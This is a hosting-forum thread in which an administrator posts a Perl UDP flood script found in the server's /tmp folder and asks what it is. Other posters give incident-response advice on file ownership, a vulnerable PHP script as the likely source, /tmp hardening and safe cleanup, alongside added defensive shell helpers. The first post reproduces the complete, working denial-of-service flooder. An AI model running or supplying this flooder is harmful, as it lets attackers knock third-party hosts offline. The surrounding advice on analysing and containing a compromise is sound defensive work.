
Script in tmp made by Hacker

Discussion in 'General Discussion' started by jeroman8, Dec 14, 2004.

  1. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    16
    I had a script made by a hacking team called UMHCreW in my TMP folder.
    Anyone know what it is ?

    Is it ok to remove/delete ALL files in the tmp folder or will this
    screw something up ?
    I have old files and a lot of folders and crazy files in there.

    Here's the script...


    #!/usr/bin/perl
    #####################################################
    # Simple but agressive udp flood.
    #
    # gr33ts: Amaz1ng^ RUBIN1,Caffeine,cyberboki, etc.
    #
    # lemurian from UMHCreW @ eu.undernet.org #deadworld
    ######################################################

    use Socket;

    $ARGC=@ARGV;

    if ($ARGC !=3) {
    printf "UMHCreW 2004\n";
    printf "$0 <ip> <port> <time>\n";
    printf "if arg1/2 =0, randports/continous packets.\n";
    exit(1);
    }

    my ($ip,$port,$size,$time);
    $ip=$ARGV[0];
    $port=$ARGV[1];
    $time=$ARGV[2];

    socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

    printf "Simpe but Agressive udp flood - lemurian@UMHCreW\n";

    if ($ARGV[1] ==0 && $ARGV[2] ==0) {
    goto randpackets;
    }
    if ($ARGV[1] !=0 && $ARGV[2] !=0) {
    system("(sleep $time;killall -9 udp) &");
    goto packets;
    }
    if ($ARGV[1] !=0 && $ARGV[2] ==0) {
    goto packets;
    }
    if ($ARGV[1] ==0 && $ARGV[2] !=0) {
    system("(sleep $time;killall -9 udp) &");
    goto randpackets;
    }

    packets:
    for (;;) {
    $size=$rand x $rand x $rand;
    send(crazy, 0, $size, sockaddr_in($port, $iaddr));
    }

    randpackets:
    for (;;) {
    $size=$rand x $rand x $rand;
    $port=int(rand 65000) +1;
    send(crazy, 0, $size, sockaddr_in($port, $iaddr));
    }
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Well, that's just the symptoms of a problem. What is the ownership of that file? If it's nobody:nobody, then you have a vulnerable PHP script on your server and you need to track it down and either fix or remove it. If it's owned by a user, you can then suspend their account while you investigate further. You should also make sure that the script is not actually running on your server (i.e. look for it having open ports) and then definitely move it somewhere safe. Simply deleting it first before investigating further is not necessarily the best thing to do. Moving it, or tar'ing it up and preserving the ownership should be first.
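    The triage order chirpy describes (record ownership, check whether the thing is running, then preserve it rather than delete it) as a small shell helper. This is an added example, not chirpy's or cPanel's code; the quarantine directory path is an assumption and the check for the web server user assumes mod_php running as nobody, as in the original post.

```sh
#!/bin/sh
# Added example (not from the thread): triage a suspicious file found in /tmp.
# Order of operations: record ownership, see whether it is live, then move it
# into a quarantine tarball that keeps owner/mode/mtime as evidence.
# Assumption: run as root on the affected server; QUARANTINE_DIR is made up.

QUARANTINE_DIR="${QUARANTINE_DIR:-/root/quarantine}"   # assumed path

# Print "user:group mode" for a file (GNU coreutils stat).
file_owner() {
    stat -c '%U:%G %a' "$1"
}

# Return 0 when the file is owned by the web server's unprivileged user,
# which on this thread's setup (mod_php as nobody) means a PHP script wrote it.
owned_by_webserver() {
    owner=$(stat -c '%U' "$1")
    [ "$owner" = "nobody" ]
}

# Show whether the file is in use: processes holding it open, and any process
# whose command line names it (a Perl tool runs as "perl /tmp/x", so the
# perl process, not the file, is what shows up in ps).
running_processes() {
    if command -v lsof >/dev/null 2>&1; then
        lsof -- "$1" 2>/dev/null
    elif command -v fuser >/dev/null 2>&1; then
        fuser -v -- "$1" 2>&1
    fi
    ps -eo pid,user,args | grep -F -- "$1" | grep -v grep
    # Listening/open UDP sockets, for the "look for it having open ports" step
    if command -v ss >/dev/null 2>&1; then ss -unap 2>/dev/null; else netstat -unap 2>/dev/null; fi
}

# Move the file into a timestamped tarball under QUARANTINE_DIR, preserving
# permissions (-p) and ownership (stored in the tar header by default), then
# remove the original. Prints the tarball path on success.
quarantine_file() {
    f="$1"
    mkdir -p "$QUARANTINE_DIR"
    chmod 700 "$QUARANTINE_DIR"
    out="$QUARANTINE_DIR/$(basename "$f").$(date +%Y%m%d%H%M%S).tar"
    tar -cpf "$out" -C "$(dirname "$f")" "$(basename "$f")" || return 1
    rm -f -- "$f"
    echo "$out"
}

# Typical use on a box: inspect first, quarantine last.
#   file_owner /tmp/suspicious.pl
#   owned_by_webserver /tmp/suspicious.pl && echo "written by the web server user"
#   running_processes /tmp/suspicious.pl
#   quarantine_file /tmp/suspicious.pl
```

    Keep the tarball off the web-served tree and note its path, ownership and the time you found it; that record is what you will want when you go looking for the PHP script that dropped it.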
     
  3. GOT

    GOT Get Proactive!

    Joined:
    Apr 8, 2003
    Messages:
    900
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Norfolk, VA
    cPanel Access Level:
    DataCenter Provider
    Good advice for sure chirpy.

    Also make sure that you secure your /tmp directory (/scripts/securetmp is the easiest method.)
     
  4. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    16
    Yes, it's nobody that owns the file.

    How can I track which php script does this ?
    Just some basic stuff so I can go from there would be nice :)
     
  5. GOT

    GOT Get Proactive!

    Joined:
    Apr 8, 2003
    Messages:
    900
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Norfolk, VA
    cPanel Access Level:
    DataCenter Provider
    Short of running php as suexec you'll really not be able to track it down, save for searching every php file and even that may not turn it up.

    You cannot prevent php from writing to the /tmp directory, so what you need to do is make it so that people cannot execute programs from there. Remove access to compilers. Security for your server needs to be taken very seriously (not saying that you are not) and you should either spend some time reading up on how to secure your linux server, or contract it to one of the several reputable server admins hanging around.
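    GOT's point is that /tmp will always be writable, so the control is to stop things being executed from it; in cPanel terms that is what /scripts/securetmp is for. The following added example (not GOT's or cPanel's code) checks the result: it parses /proc/mounts-format text and reports whether /tmp is mounted with noexec and nosuid. The sample mount lines are constructed, and it is an assumption here that securetmp leaves /tmp mounted with exactly those options.

```sh
#!/bin/sh
# Added example, not from the thread: verify that /tmp is a separate mount
# carrying noexec and nosuid. Works on /proc/mounts format
# (device mountpoint fstype options dump pass); constructed samples are
# embedded so the functions can be exercised offline.

# Constructed sample: /tmp mounted, but with default options only.
SAMPLE_WEAK='/dev/sda1 / ext3 rw,errors=remount-ro 0 0
/dev/sda2 /tmp ext3 rw 0 0'

# Constructed sample: /tmp not a mount at all (lives on the root filesystem).
SAMPLE_NO_MOUNT='/dev/sda1 / ext3 rw,errors=remount-ro 0 0'

# Constructed sample: loopback /tmp with the options securetmp is assumed to set.
SAMPLE_HARDENED='/dev/sda1 / ext3 rw,errors=remount-ro 0 0
/usr/tmpDSK /tmp ext3 rw,noexec,nosuid,loop=/dev/loop0 0 0'

# Print the option field of the given mountpoint from mounts text on stdin.
mount_opts() {
    awk -v mp="$1" '$2 == mp { print $4; exit }'
}

# Return 0 if the comma-separated option string $1 contains every option
# named in the remaining arguments.
has_opts() {
    opts="$1"; shift
    for want in "$@"; do
        case ",$opts," in
            *",$want,"*) ;;
            *) return 1 ;;
        esac
    done
    return 0
}

# Classify a mountpoint ($2, default /tmp) in mounts text $1:
# prints "hardened", "weak" or "unmounted".
tmp_status() {
    mounts="$1"; mp="${2:-/tmp}"
    opts=$(printf '%s\n' "$mounts" | mount_opts "$mp")
    if [ -z "$opts" ]; then
        echo unmounted          # on the root fs, so it can't carry noexec
    elif has_opts "$opts" noexec nosuid; then
        echo hardened
    else
        echo weak
    fi
}

# Live check against the running system (read /proc/mounts directly).
check_live_tmp() {
    tmp_status "$(cat /proc/mounts)" /tmp
}
```

    Run check_live_tmp after securetmp and expect "hardened". One caveat worth knowing: noexec only stops the kernel from executing a file directly (./udp or a chmod +x script). A dropped Perl script can still be started as "perl /tmp/script" because the interpreter merely reads the file, which is why the thread also says to restrict compilers and, above all, to find and fix the PHP script that wrote the file.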
     
  6. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    16
    Thank you!

    Is it ok to delete all old tmp files ?
    They are just there right, leftovers...
     
  7. GOT

    GOT Get Proactive!

    Joined:
    Apr 8, 2003
    Messages:
    900
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Norfolk, VA
    cPanel Access Level:
    DataCenter Provider
    Yes, it is generally safe to delete them. In some cases if you are running Fantastico, it might cause a decoder error.
     
  8. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Make sure that you don't delete the mysql lock file.
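    A cleanup helper that follows the last two replies: it only touches regular files older than a given number of days, so sockets are never candidates, and it additionally skips the MySQL socket and its lock file by name. It lists by default and deletes only when asked. This is an added example, not code from the thread or from cPanel; the seven-day default is an arbitrary choice.

```sh
#!/bin/sh
# Added example, not from the thread: remove stale temp files without
# disturbing the MySQL socket/lock file or anything written recently.

# List regular files under $1 older than $2 days (default 7). -type f already
# excludes sockets; the name test skips mysql.sock and mysql.sock.lock.
stale_tmp_files() {
    dir="$1"; days="${2:-7}"
    find "$dir" -xdev -type f -mtime +"$days" ! -name 'mysql.sock*'
}

# Dry run by default: print what would go. Pass "delete" as $3 to remove.
clean_tmp() {
    dir="$1"; days="${2:-7}"; mode="${3:-dry-run}"
    stale_tmp_files "$dir" "$days" | while IFS= read -r f; do
        if [ "$mode" = delete ]; then
            rm -f -- "$f"
        else
            printf 'would delete: %s\n' "$f"
        fi
    done
}

# Usage on a server (review the dry run first):
#   clean_tmp /tmp 7
#   clean_tmp /tmp 7 delete
```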
     